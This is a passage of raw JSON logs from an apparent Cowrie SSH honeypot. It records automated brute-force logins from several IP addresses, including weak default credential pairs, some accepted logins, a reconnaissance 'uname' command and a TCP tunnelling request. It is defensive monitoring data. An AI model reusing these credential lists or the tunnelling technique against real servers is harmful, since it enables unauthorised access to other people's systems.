cdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-31T02:25:23.983269Z","src_ip":"212.227.235.229","session":"f6bab8f16133"}
{"eventid":"cowrie.login.failed","username":"test","password":"test1234","message":"login attempt [test/test1234] failed","sensor":"my-vps","timestamp":"2025-08-31T02:25:24.279440Z","src_ip":"212.227.125.160","session":"8e08bed78d27"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43648,"dst_ip":"1.2.3.4","dst_port":22,"session":"f6ae7b06ccc0","protocol":"ssh","message":"New connection: 212.227.125.160:43648 (1.2.3.4:22) [session: f6ae7b06ccc0]","sensor":"my-vps","timestamp":"2025-08-31T02:25:24.284068Z"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:25:24.963017Z","src_ip":"212.227.235.229","session":"f6bab8f16133"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-31T02:25:25.136347Z","session":"f6bab8f16133"}
{"eventid":"cowrie.login.failed","username":"test","password":"test123","message":"login attempt [test/test123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:25:25.367013Z","src_ip":"212.227.125.160","session":"8e08bed78d27"}
{"eventid":"cowrie.login.failed","username":"test","password":"123","message":"login attempt [test/123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:25:26.449135Z","src_ip":"212.227.125.160","session":"8e08bed78d27"}
{"eventid":"cowrie.login.failed","username":"test","password":"1234","message":"login attempt [test/1234] failed","sensor":"my-vps","timestamp":"2025-08-31T02:25:27.532129Z","src_ip":"212.227.125.160","session":"8e08bed78d27"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39810,"dst_ip":"1.2.3.4","dst_port":22,"session":"b85eac2f2b41","protocol":"ssh","message":"New connection: 212.227.125.160:39810 (1.2.3.4:22) [session: b85eac2f2b41]","sensor":"my-vps","timestamp":"2025-08-31T02:25:28.167734Z"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:25:28.614291Z","src_ip":"212.227.125.160","session":"8e08bed78d27"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:25:28.761547Z","src_ip":"212.227.125.160","session":"b85eac2f2b41"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:25:28.762369Z","src_ip":"212.227.125.160","session":"b85eac2f2b41"}
{"eventid":"cowrie.login.failed","username":"elasticsearch","password":"root123","message":"login attempt [elasticsearch/root123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:25:30.996878Z","src_ip":"212.227.125.160","session":"b85eac2f2b41"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:25:32.392458Z","src_ip":"212.227.125.160","session":"b85eac2f2b41"}
{"eventid":"cowrie.login.failed","username":"hive","password":"hive","message":"login attempt [hive/hive] failed","sensor":"my-vps","timestamp":"2025-08-31T02:25:35.953279Z","src_ip":"212.227.235.229","session":"0bd8abc5156c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52186,"dst_ip":"1.2.3.4","dst_port":22,"session":"a68237c98d58","protocol":"ssh","message":"New connection: 212.227.235.229:52186 (1.2.3.4:22) [session: a68237c98d58]","sensor":"my-vps","timestamp":"2025-08-31T02:25:37.876990Z"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":50204,"dst_ip":"1.2.3.4","dst_port":22,"session":"a750f2f999c0","protocol":"ssh","message":"New connection: 41.226.27.251:50204 (1.2.3.4:22) [session: a750f2f999c0]","sensor":"my-vps","timestamp":"2025-08-31T02:25:41.589813Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:25:41.590803Z","src_ip":"41.226.27.251","session":"a750f2f999c0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:25:41.634454Z","src_ip":"41.226.27.251","session":"a750f2f999c0"}
{"eventid":"cowrie.login.failed","username":"esuser","password":"123456","message":"login attempt [esuser/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T02:25:41.766731Z","src_ip":"41.226.27.251","session":"a750f2f999c0"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:25:43.013716Z","src_ip":"41.226.27.251","session":"a750f2f999c0"}
{"eventid":"cowrie.session.closed","duration":"21.9","message":"Connection lost after 21.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:25:46.232811Z","src_ip":"212.227.125.160","session":"f6ae7b06ccc0"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":38334,"dst_ip":"1.2.3.4","dst_port":22,"session":"20046f144df1","protocol":"ssh","message":"New connection: 41.226.27.251:38334 (1.2.3.4:22) [session: 20046f144df1]","sensor":"my-vps","timestamp":"2025-08-31T02:26:01.859068Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:26:01.927479Z","src_ip":"41.226.27.251","session":"20046f144df1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:26:01.928513Z","src_ip":"41.226.27.251","session":"20046f144df1"}
{"eventid":"cowrie.login.success","username":"root","password":"Pa$$w0rd","message":"login attempt [root/Pa$$w0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:26:02.145616Z","src_ip":"41.226.27.251","session":"20046f144df1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:26:02.253679Z","src_ip":"41.226.27.251","session":"20046f144df1"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T02:26:02.254557Z","src_ip":"41.226.27.251","session":"20046f144df1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:26:02.301528Z","src_ip":"41.226.27.251","session":"20046f144df1"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:26:02.302648Z","src_ip":"41.226.27.251","session":"20046f144df1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58316,"dst_ip":"1.2.3.4","dst_port":22,"session":"884c7240a748","protocol":"ssh","message":"New connection: 212.227.235.229:58316 (1.2.3.4:22) [session: 884c7240a748]","sensor":"my-vps","timestamp":"2025-08-31T02:26:08.491114Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:26:09.194874Z","src_ip":"212.227.235.229","session":"884c7240a748"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:26:09.195975Z","src_ip":"212.227.235.229","session":"884c7240a748"}
{"eventid":"cowrie.session.closed","duration":"96.2","message":"Connection lost after 96.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:26:10.730619Z","src_ip":"212.227.235.229","session":"0bd8abc5156c"}
{"eventid":"cowrie.session.closed","duration":"33.4","message":"Connection lost after 33.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:26:11.241545Z","src_ip":"212.227.235.229","session":"a68237c98d58"}
{"eventid":"cowrie.login.failed","username":"elasticsearch","password":"P@ssw0rd123","message":"login attempt [elasticsearch/P@ssw0rd123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:26:15.305530Z","src_ip":"212.227.235.229","session":"884c7240a748"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:26:17.173851Z","src_ip":"212.227.235.229","session":"884c7240a748"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":52666,"dst_ip":"1.2.3.4","dst_port":22,"session":"677ca3769c35","protocol":"ssh","message":"New connection: 41.226.27.251:52666 (1.2.3.4:22) [session: 677ca3769c35]","sensor":"my-vps","timestamp":"2025-08-31T02:26:22.589382Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:26:22.590602Z","src_ip":"41.226.27.251","session":"677ca3769c35"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:26:22.643786Z","src_ip":"41.226.27.251","session":"677ca3769c35"}
{"eventid":"cowrie.login.failed","username":"git","password":"123456","message":"login attempt [git/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T02:26:22.806041Z","src_ip":"41.226.27.251","session":"677ca3769c35"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:26:24.124214Z","src_ip":"41.226.27.251","session":"677ca3769c35"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49062,"dst_ip":"1.2.3.4","dst_port":22,"session":"345554016be9","protocol":"ssh","message":"New connection: 212.227.125.160:49062 (1.2.3.4:22) [session: 345554016be9]","sensor":"my-vps","timestamp":"2025-08-31T02:26:30.312908Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:26:30.819546Z","src_ip":"212.227.125.160","session":"345554016be9"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:26:30.820314Z","src_ip":"212.227.125.160","session":"345554016be9"}
{"eventid":"cowrie.login.failed","username":"elasticsearch","password":"P@ssw0rd123","message":"login attempt [elasticsearch/P@ssw0rd123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:26:33.144245Z","src_ip":"212.227.125.160","session":"345554016be9"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:26:33.809398Z","src_ip":"212.227.235.229","session":"f6bab8f16133"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:26:34.650043Z","src_ip":"212.227.125.160","session":"345554016be9"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":40756,"dst_ip":"1.2.3.4","dst_port":22,"session":"1ac6302f10ab","protocol":"ssh","message":"New connection: 41.226.27.251:40756 (1.2.3.4:22) [session: 1ac6302f10ab]","sensor":"my-vps","timestamp":"2025-08-31T02:26:43.267366Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:26:43.268241Z","src_ip":"41.226.27.251","session":"1ac6302f10ab"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:26:43.311049Z","src_ip":"41.226.27.251","session":"1ac6302f10ab"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"123","message":"login attempt [postgres/123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:26:43.441632Z","src_ip":"41.226.27.251","session":"1ac6302f10ab"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:26:44.611406Z","src_ip":"41.226.27.251","session":"1ac6302f10ab"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49136,"dst_ip":"1.2.3.4","dst_port":22,"session":"cb4f93a87fdb","protocol":"ssh","message":"New connection: 212.227.125.160:49136 (1.2.3.4:22) [session: cb4f93a87fdb]","sensor":"my-vps","timestamp":"2025-08-31T02:26:57.887715Z"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":10261,"dst_ip":"1.2.3.4","dst_port":22,"session":"9902cd81b362","protocol":"ssh","message":"New connection: 77.83.207.83:10261 (1.2.3.4:22) [session: 9902cd81b362]","sensor":"my-vps","timestamp":"2025-08-31T02:26:58.344237Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T02:26:58.345076Z","src_ip":"77.83.207.83","session":"9902cd81b362"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T02:26:58.396855Z","src_ip":"77.83.207.83","session":"9902cd81b362"}
